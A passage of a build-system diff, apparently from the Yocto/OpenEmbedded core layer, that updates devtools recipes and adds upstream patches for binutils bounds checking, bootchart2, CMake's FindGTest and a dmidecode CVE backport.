+ for (j = first; j < last; j++)
+ {
+ unsigned int isym = dysymtab->indirect_syms[j];
+-
+- /* PR 17512: file: 04d64d9b. */
+- if (((char *) s) + sizeof (* s) > s_end)
+- goto fail;
+-
+- s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
+- s->section = sec->bfdsection;
+- s->value = addr - sec->addr;
+- s->udata.p = NULL;
++ const char *str;
++ size_t len;
+
+ if (isym < symtab->nsyms
+- && symtab->symbols[isym].symbol.name)
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
+ {
+- const char *sym = symtab->symbols[isym].symbol.name;
+- size_t len;
+-
+- s->name = names;
+- len = strlen (sym);
+- /* PR 17512: file: 47dfd4d2. */
+- if (names + len >= s_end)
++ /* PR 17512: file: 04d64d9b. */
++ if (n >= count)
+ goto fail;
+- memcpy (names, sym, len);
+- names += len;
+- /* PR 17512: file: 18f340a4. */
+- if (names + sizeof (stub) >= s_end)
++ len = strnlen (str, symtab->strsize - (str - symtab->strtab));
++ /* PR 17512: file: 47dfd4d2, 18f340a4. */
++ if (size < len + sizeof (stub))
+ goto fail;
+- memcpy (names, stub, sizeof (stub));
+- names += sizeof (stub);
++ memcpy (names, str, len);
++ memcpy (names + len, stub, sizeof (stub));
++ s->name = names;
++ names += len + sizeof (stub);
++ size -= len + sizeof (stub);
++ s->the_bfd = symtab->symbols[isym].symbol.the_bfd;
++ s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
++ s->section = sec->bfdsection;
++ s->value = addr - sec->addr;
++ s->udata.p = NULL;
++ s++;
++ n++;
+ }
+- else
+- s->name = nul_name;
+-
+ addr += entry_size;
+- s++;
+- n++;
+ }
+ break;
+ default:
+--
+2.39.3
+
diff --git a/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
new file mode 100644
index 0000000000..3cb8a3c2a2
--- /dev/null
+++ b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
@@ -0,0 +1,68 @@
+From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Fri, 5 Nov 2021 11:18:07 +0800
+Subject: [PATCH] bootchartd.in: make sure only one bootchartd process
+
+When boot with "init=/sbin/bootchartd" as below:
+ # runqemu qemux86 bootparams="init=/sbin/bootchartd"
+
+There are two bootchartd process after boot [1].
+ # ps -ef | grep bootchart
+root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50
+root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000
+root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart
+
+ # /sbin/bootchartd stop
+[bootchart] bootchart-collector started as pid 596 with 2 args:
+[bootchart] '--dump'
+[bootchart] '/tmp/bootchart.3lXpVDAq3v'
+[bootchart] Extracting profile data from pid 204
+[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000'
+[bootchart] read 135168 bytes of 135168
+[bootchart] reading 150 chunks (of 150) ...
+[bootchart] wrote 18760 kbB
+[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit
+
+But there still one process exist after the above stop command finish.
+ # ps -ef | grep bootchartd
+root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 629 516 0 09:10 ? 00:00:00 grep bootchartd
+
+Remove the wait_boot which used to wait the boot process to finish to
+make sure only one bootchartd process and meanwhile we don't need the
+wait_boot logic because we either use "/sbin/bootchartd stop" to stop
+the bootchartd manually or install package bootchartd-stop-initscript
+altogether with bootchart2 to stop bootchartd automatically after boot.
+
+After patch:
+ # ps -ef | grep bootchart
+ root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd
+ root 103 101 6 03:36 ? 00:00:04 /lib64/bootchart/bootchart-collector 50
+ root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart
+
+[1] https://github.com/xrmx/bootchart/issues/94
+
+Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ bootchartd.in | 1 -
+ 1 file changed, 1 deletion(-)
+
+diff --git a/bootchartd.in b/bootchartd.in
+index 7979ef9..f0e466d 100755
+--- a/bootchartd.in
++++ b/bootchartd.in
+@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then
+ else # running inside the main system
+ echo "bootchart: no initrd used; starting"
+ start &
+- wait_boot &
+ # wait a little, until the collector is going, before allowing
+ # the rest of the system to charge ahead, so we catch it
+ $USLEEP 250000
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index a938b2da49..7f05bd1b0b 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -90,15 +90,15 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)"
-SRC_URI = "git://github.com/xrmx/bootchart.git \
+SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \
file://bootchartd_stop.sh \
file://0001-collector-Allocate-space-on-heap-for-chunks.patch \
file://0001-bootchart2-support-usrmerge.patch \
+ file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \
"
S = "${WORKDIR}/git"
-SRCREV = "331ada031f1d65f6d934d918f896e1c708c64bf7"
-PV .= "+git${SRCPV}"
+SRCREV = "868a2afab9da34f32c007d773b77253c93104636"
inherit systemd update-rc.d python3native update-alternatives
@@ -144,7 +144,7 @@ do_install () {
PACKAGES =+ "pybootchartgui"
FILES_pybootchartgui += "${PYTHON_SITEPACKAGES_DIR}/pybootchartgui ${bindir}/pybootchartgui"
-RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-shell python3-compression python3-codecs"
+RDEPENDS_pybootchartgui = "python3-pycairo python3-compression python3-image python3-math python3-shell python3-compression python3-codecs"
RDEPENDS_${PN}_class-target += "${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'sysvinit-pidof', 'procps', d)}"
RDEPENDS_${PN}_class-target += "lsb-release"
DEPENDS_append_class-native = " python3-pycairo-native"
diff --git a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
index cdc971cf5d..be61916cc6 100644
--- a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
+++ b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev"
RDEPENDS_${PN} = "libgcc"
SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334"
-SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \
+SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \
file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \
"
@@ -49,4 +49,4 @@ do_install_append() {
fi
}
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-devtools/build-compare/build-compare_git.bb b/meta/recipes-devtools/build-compare/build-compare_git.bb
index b0560cc277..6afa9a0d68 100644
--- a/meta/recipes-devtools/build-compare/build-compare_git.bb
+++ b/meta/recipes-devtools/build-compare/build-compare_git.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
-SRC_URI = "git://github.com/openSUSE/build-compare.git \
+SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \
file://Ignore-DWARF-sections.patch;striplevel=1 \
"
diff --git a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
index c08da6cdca..cd2ca8dbe9 100644
--- a/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
+++ b/meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb
@@ -3,6 +3,7 @@
# Released under the MIT license (see packages/COPYING)
SUMMARY = "A set of tools for CD recording, including cdrecord"
HOMEPAGE = "http://sourceforge.net/projects/cdrtools/"
+DESCRIPTION = "cdrecord tool is Highly portable CD/DVD/BluRay command line recording software."
SECTION = "console/utils"
LICENSE = "GPLv2 & CDDL-1.0 & LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=32f68170be424c2cd64804337726b312"
diff --git a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
index b2952ee5f5..96a7be6770 100644
--- a/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
+++ b/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb
@@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \
file://environment.d-cmake.sh \
file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \
file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \
+ file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \
"
diff --git a/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
new file mode 100644
index 0000000000..267f586a71
--- /dev/null
+++ b/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch
@@ -0,0 +1,255 @@
+From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001
+From: Eero Aaltonen <eero.aaltonen@iki.fi>
+Date: Sun, 17 Oct 2021 17:13:07 +0300
+Subject: [PATCH] FindGTest: Add target for gmock library
+
+`googlemock` has been absorbed into the
+[googletest](https://github.com/google/googletest) project and is built
+and installed from the same source tree.
+
+As GTest may be built with or without GMock, skip GMock if it is not
+present.
+
+Do not provide result variables for GMock. They are not provided by
+upstream GTest's CMake Package Configuration File.
+
+Also update the test case to cover linking to `GTest::gmock`.
+
+The patch was imported from the Kitware git server
+(git@gitlab.kitware.com:cmake/cmake.git) as of commit id
+50bf457a0dd857cf976b22c5be7d333493233d1e
+
+Patch was modified to support upper case variable `GTEST_FOUND`.
+
+Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632]
+Milestone: 3.23.0
+
+Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com>
+---
+ .../dev/FindGTest-target-for-gmock.rst | 4 +
+ Modules/FindGTest.cmake | 133 +++++++++++++++---
+ Tests/FindGTest/Test/CMakeLists.txt | 4 +
+ 3 files changed, 121 insertions(+), 20 deletions(-)
+ create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst
+
+diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst
+new file mode 100644
+index 0000000000..f78242c80e
+--- /dev/null
++++ b/Help/release/dev/FindGTest-target-for-gmock.rst
+@@ -0,0 +1,4 @@
++FindGTest-target-for-gmock
++--------------------------
++
++* The :module:`FindGTest` module now provides a target for GMock, if found.
+diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake
+index e015a9840f..0331049594 100644
+--- a/Modules/FindGTest.cmake
++++ b/Modules/FindGTest.cmake
+@@ -7,10 +7,23 @@ FindGTest
+
+ Locate the Google C++ Testing Framework.
+
++.. versionadded:: 3.20
++ Upstream ``GTestConfig.cmake`` is used if possible.
++
+ Imported targets
+ ^^^^^^^^^^^^^^^^
+
+-This module defines the following :prop_tgt:`IMPORTED` targets:
++ This module defines the following :prop_tgt:`IMPORTED` targets:
++
++``GTest::gtest``
++ The Google Test ``gtest`` library, if found; adds Thread::Thread
++ automatically
++``GTest::gtest_main``
++ The Google Test ``gtest_main`` library, if found
++
++.. deprecated:: 3.20
++ For backwards compatibility, this module defines additionally the
++ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5):
+
+ ``GTest::GTest``
+ The Google Test ``gtest`` library, if found; adds Thread::Thread
+@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets:
+ ``GTest::Main``
+ The Google Test ``gtest_main`` library, if found
+
+-
+ Result variables
+ ^^^^^^^^^^^^^^^^
+
+@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config)
+ endif()
+ endfunction()
+
++function(__gtest_define_backwards_compatible_library_targets)
++ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE)
++
++ # Add targets mapping the same library names as defined in
++ # older versions of CMake's FindGTest
++ if(NOT TARGET GTest::GTest)
++ add_library(GTest::GTest INTERFACE IMPORTED)
++ target_link_libraries(GTest::GTest INTERFACE GTest::gtest)
++ endif()
++ if(NOT TARGET GTest::Main)
++ add_library(GTest::Main INTERFACE IMPORTED)
++ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main)
++ endif()
++endfunction()
++
+ #
+
++include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
++
++# first specifically look for the CMake version of GTest
++find_package(GTest QUIET NO_MODULE)
++
++# if we found the GTest cmake package then we are done, and
++# can print what we found and return.
++if(GTest_FOUND)
++ set(GTEST_FOUND ${GTest_FOUND})
++ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE)
++
++ set(GTEST_LIBRARIES GTest::gtest)
++ set(GTEST_MAIN_LIBRARIES GTest::gtest_main)
++
++ __gtest_define_backwards_compatible_library_targets()
++
++ return()
++endif()
++
+ if(NOT DEFINED GTEST_MSVC_SEARCH)
+ set(GTEST_MSVC_SEARCH MD)
+ endif()
+@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD")
+ __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd)
+ __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main)
+ __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind)
++ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock)
++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind)
+ else()
+ __gtest_find_library(GTEST_LIBRARY gtest)
+ __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd)
+ __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main)
+ __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind)
++ __gtest_find_library(GMOCK_LIBRARY gmock)
++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main)
++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind)
+ endif()
+
+-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake)
+ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY)
+
+-if(GTEST_FOUND)
++if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY)
++ set(GMock_FOUND True)
++else()
++ set(GMock_FOUND False)
++endif()
++
++if(GTest_FOUND)
+ set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR})
+ __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY)
+ __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY)
+- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES})
+
+ find_package(Threads QUIET)
+
+- if(NOT TARGET GTest::GTest)
++ if(NOT TARGET GTest::gtest)
+ __gtest_determine_library_type(GTEST_LIBRARY)
+- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED)
++ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED)
+ if(TARGET Threads::Threads)
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_LINK_LIBRARIES Threads::Threads)
+ endif()
+ if(GTEST_LIBRARY_TYPE STREQUAL "SHARED")
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1")
+ endif()
+ if(GTEST_INCLUDE_DIRS)
+- set_target_properties(GTest::GTest PROPERTIES
++ set_target_properties(GTest::gtest PROPERTIES
+ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
+ endif()
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "")
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE")
+- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG")
+ endif()
+- if(NOT TARGET GTest::Main)
++ if(NOT TARGET GTest::gtest_main)
+ __gtest_determine_library_type(GTEST_MAIN_LIBRARY)
+- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
+- set_target_properties(GTest::Main PROPERTIES
+- INTERFACE_LINK_LIBRARIES "GTest::GTest")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE")
+- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG")
++ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED)
++ set_target_properties(GTest::gtest_main PROPERTIES
++ INTERFACE_LINK_LIBRARIES "GTest::gtest")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG")
++ endif()
++
++ __gtest_define_backwards_compatible_library_targets()
++endif()
++
++if(GMock_FOUND)
++ if(NOT TARGET GTest::gmock)
++ __gtest_determine_library_type(GMOCK_LIBRARY)
++ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED)
++ set(_gmock_link_libraries "GTest::gtest")
++ if(TARGET Threads::Threads)
++ list(APPEND _gmock_link_libraries Threads::Threads)
++ endif()
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}")
++ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED")
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1")
++ endif()
++ if(GTEST_INCLUDE_DIRS)
++ set_target_properties(GTest::gmock PROPERTIES
++ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}")
++ endif()
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "")
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG")
++ endif()
++ if(NOT TARGET GTest::gmock_main)
++ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY)
++ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED)
++ set_target_properties(GTest::gmock_main PROPERTIES
++ INTERFACE_LINK_LIBRARIES "GTest::gmock")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE")
++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG")
+ endif()
+ endif()
+diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt
+index b65b9d28f6..7d3a378a65 100644
+--- a/Tests/FindGTest/Test/CMakeLists.txt
++++ b/Tests/FindGTest/Test/CMakeLists.txt
+@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx)
+ target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS})
+ target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT})
+ add_test(NAME test_gtest_var COMMAND test_gtest_var)
++
++add_executable(test_gmock_tgt main.cxx)
++target_link_libraries(test_gmock_tgt GTest::gmock_main)
++add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt)
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
index 398069eef2..870009c2ba 100644
--- a/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
+++ b/meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake
@@ -2,7 +2,6 @@ set( CMAKE_SYSTEM_NAME Linux )
set( CMAKE_C_FLAGS $ENV{CFLAGS} CACHE STRING "" FORCE )
set( CMAKE_CXX_FLAGS $ENV{CXXFLAGS} CACHE STRING "" FORCE )
set( CMAKE_ASM_FLAGS ${CMAKE_C_FLAGS} CACHE STRING "" FORCE )
-set( CMAKE_LDFLAGS_FLAGS ${CMAKE_CXX_FLAGS} CACHE STRING "" FORCE )
set( CMAKE_SYSROOT $ENV{OECORE_TARGET_SYSROOT} )
set( CMAKE_FIND_ROOT_PATH $ENV{OECORE_TARGET_SYSROOT} )
@@ -13,13 +12,13 @@ set( CMAKE_FIND_ROOT_PATH_MODE_PACKAGE ONLY )
set(CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX "$ENV{OE_CMAKE_FIND_LIBRARY_CUSTOM_LIB_SUFFIX}")
-# Set CMAKE_SYSTEM_PROCESSOR from the sysroot name (assuming processor-distro-os).
-if ($ENV{SDKTARGETSYSROOT} MATCHES "/sysroots/([a-zA-Z0-9_-]+)-.+-.+")
- set(CMAKE_SYSTEM_PROCESSOR ${CMAKE_MATCH_1})
-endif()
+set( CMAKE_SYSTEM_PROCESSOR $ENV{OECORE_TARGET_ARCH} )
# Include the toolchain configuration subscripts
file( GLOB toolchain_config_files "${CMAKE_TOOLCHAIN_FILE}.d/*.cmake" )
foreach(config ${toolchain_config_files})
include(${config})
endforeach()
+
+unset(CMAKE_C_IMPLICIT_INCLUDE_DIRECTORIES)
+unset(CMAKE_CXX_IMPLICIT_INCLUDE_DIRECTORIES)
diff --git a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
index c6a53ffece..3c403a4077 100644
--- a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
+++ b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/createrepo_c \
+SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \
file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
diff --git a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
index 10220ebc91..ce242c3593 100644
--- a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
+++ b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
@@ -1,11 +1,13 @@
SUMMARY = "GNU unit testing framework, written in Expect and Tcl"
DESCRIPTION = "DejaGnu is a framework for testing other programs. Its purpose \
is to provide a single front end for all tests."
+HOMEPAGE = "https://www.gnu.org/software/dejagnu/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
SECTION = "devel"
DEPENDS += "expect-native"
+RDEPENDS_${PN} = "expect"
inherit autotools
diff --git a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
index aecba07235..0418ae0c5f 100644
--- a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
+++ b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
@@ -1,6 +1,7 @@
-SECTION = "console/utils"
SUMMARY = "Command line utilities for working with *.desktop files"
+DESCRIPTION = "desktop-file-utils contains a few command line utilities for working with desktop entries"
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/desktop-file-utils"
+SECTION = "console/utils"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
diff --git a/meta/recipes-devtools/devel-config/distcc-config.bb b/meta/recipes-devtools/devel-config/distcc-config.bb
index 3cd661d543..db9e8bbcc9 100644
--- a/meta/recipes-devtools/devel-config/distcc-config.bb
+++ b/meta/recipes-devtools/devel-config/distcc-config.bb
@@ -1,4 +1,5 @@
SUMMARY = "Sets up distcc for compilation on the target device"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-devtools/diffstat/diffstat_1.63.bb b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
index 61b2ea5dc2..863f924b22 100644
--- a/meta/recipes-devtools/diffstat/diffstat_1.63.bb
+++ b/meta/recipes-devtools/diffstat/diffstat_1.63.bb
@@ -5,7 +5,7 @@ reviewing large, complex patch files."
HOMEPAGE = "http://invisible-island.net/diffstat/"
SECTION = "devel"
LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://install-sh;endline=42;md5=b3549726c1022bee09c174c72a0ca4a5"
+LIC_FILES_CHKSUM = "file://COPYING;md5=a3d0bb117493e804b0c1a868ddf23321"
SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
file://run-ptest \
@@ -16,8 +16,6 @@ SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \
SRC_URI[md5sum] = "b9272ec8af6257103261ec3622692991"
SRC_URI[sha256sum] = "7eddd53401b99b90bac3f7ebf23dd583d7d99c6106e67a4f1161b7a20110dc6f"
-S = "${WORKDIR}/diffstat-${PV}"
-
inherit autotools gettext ptest
EXTRA_AUTORECONF += "--exclude=aclocal"
diff --git a/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
index c52f136be8..2a74a068f1 100644
--- a/meta/recipes-devtools/distcc/distcc_3.3.3.bb
+++ b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
@@ -1,6 +1,7 @@
SUMMARY = "A parallel build system"
DESCRIPTION = "distcc is a parallel build system that distributes \
compilation of C/C++/ObjC code across machines on a network."
+HOMEPAGE = "https://github.com/distcc/distcc"
SECTION = "devel"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
@@ -14,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt"
RRECOMMENDS_${PN}-server = "avahi-daemon"
-SRC_URI = "git://github.com/distcc/distcc.git \
+SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \
file://fix-gnome.patch \
file://separatebuilddir.patch \
file://default \
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
new file mode 100644
index 0000000000..f1d449acbe
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
@@ -0,0 +1,236 @@
+From 24def311c6168d0dfb7c5f0f183b72b709c49265 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:21 +0100
+Subject: [PATCH] dmidecode: Split table fetching from decoding
+
+Clean up function dmi_table so that it does only one thing:
+* dmi_table() is renamed to dmi_table_get(). It now retrieves the
+ DMI table, but does not process it any longer.
+* Decoding or dumping the table is now done in smbios3_decode(),
+ smbios_decode() and legacy_decode().
+No functional change.
+
+A side effect of this change is that writing the header and body of
+dump files is now done in a single location. This is required to
+further consolidate the writing of dump files.
+
+CVE-ID: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=39b2dd7b6ab7]
+
